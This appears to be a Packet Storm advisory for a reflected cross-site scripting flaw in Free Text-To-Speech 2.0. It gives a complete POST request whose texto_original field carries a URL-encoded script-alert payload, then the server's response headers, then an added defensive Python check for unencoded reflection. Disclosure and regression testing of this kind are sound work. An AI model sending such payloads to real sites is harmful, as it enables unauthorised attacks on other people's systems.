Free Text-To-Speech 2.0 Cross Site Scripting

2015-04-20T00:00:00
ID PACKETSTORM:131527
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2015-04-20T00:00:00

Description

`+---------------------------------------------------------------------------+  
#[+] Author: TUNISIAN CYBER  
#[+] Title: Free Text-To-Speech System Cross Site Scripting  
#[+] Date: 19-04-2015  
#[+] Type: WebAPP  
#[+] Tested on: KaliLinux  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
+---------------------------------------------------------------------------+  
POC:  
http://i.imgur.com/Pstv89u.png  
  
http://127.0.0.1/nanbiquara_v2.0/  
  
POST /nanbiquara_v2.0/ HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/nanbiquara_v2.0/  
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 94  
  
texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B%3C%2Fscript%3E&voz=br1%2Fbr1  
  
HTTP/1.1 200 OK  
Date: Sun, 19 Apr 2015 20:12:59 GMT  
Server: Apache/2.2.22 (Debian)  
X-Powered-By: PHP/5.4.39-0+deb7u2  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 830  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
`
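
Added example, not part of the original advisory and not the application's code: a regression check a maintainer could run after fixing the reflection of `texto_original`. It decodes the request body shown above and reports any field whose value reaches the response without HTML entity encoding. `render_echo` is a hypothetical stand-in for the application's page, and the responses it produces are constructed.

```python
import html
from urllib.parse import parse_qsl

# Request body copied from the POST request in the advisory above.
ADVISORY_BODY = (
    "texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B"
    "%3C%2Fscript%3E&voz=br1%2Fbr1"
)

# Characters that change meaning when written into HTML unencoded.
HTML_ACTIVE = set("<>\"'&")


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into field -> value."""
    return dict(parse_qsl(body, keep_blank_values=True))


def unencoded_reflections(body: str, response_html: str) -> list:
    """Return the fields whose decoded value contains HTML-active characters
    and appears verbatim (not entity-encoded) in the response body."""
    hits = []
    for field, value in decode_form(body).items():
        if HTML_ACTIVE & set(value) and value in response_html:
            hits.append(field)
    return hits


def render_echo(value: str, encode: bool) -> str:
    """Hypothetical page model (assumption): echoes the submitted text in HTML.
    encode=False models the reported behaviour, encode=True the fixed one."""
    shown = html.escape(value, quote=True) if encode else value
    return f"<html><body><p>Text: {shown}</p></body></html>"


if __name__ == "__main__":
    text = decode_form(ADVISORY_BODY)["texto_original"]
    for encode in (False, True):
        page = render_echo(text, encode)
        label = "encoded" if encode else "raw"
        print(label, unencoded_reflections(ADVISORY_BODY, page))
```

The check only covers values echoed into HTML text or quoted attribute context; values written into script blocks or URLs need encoding for that context instead.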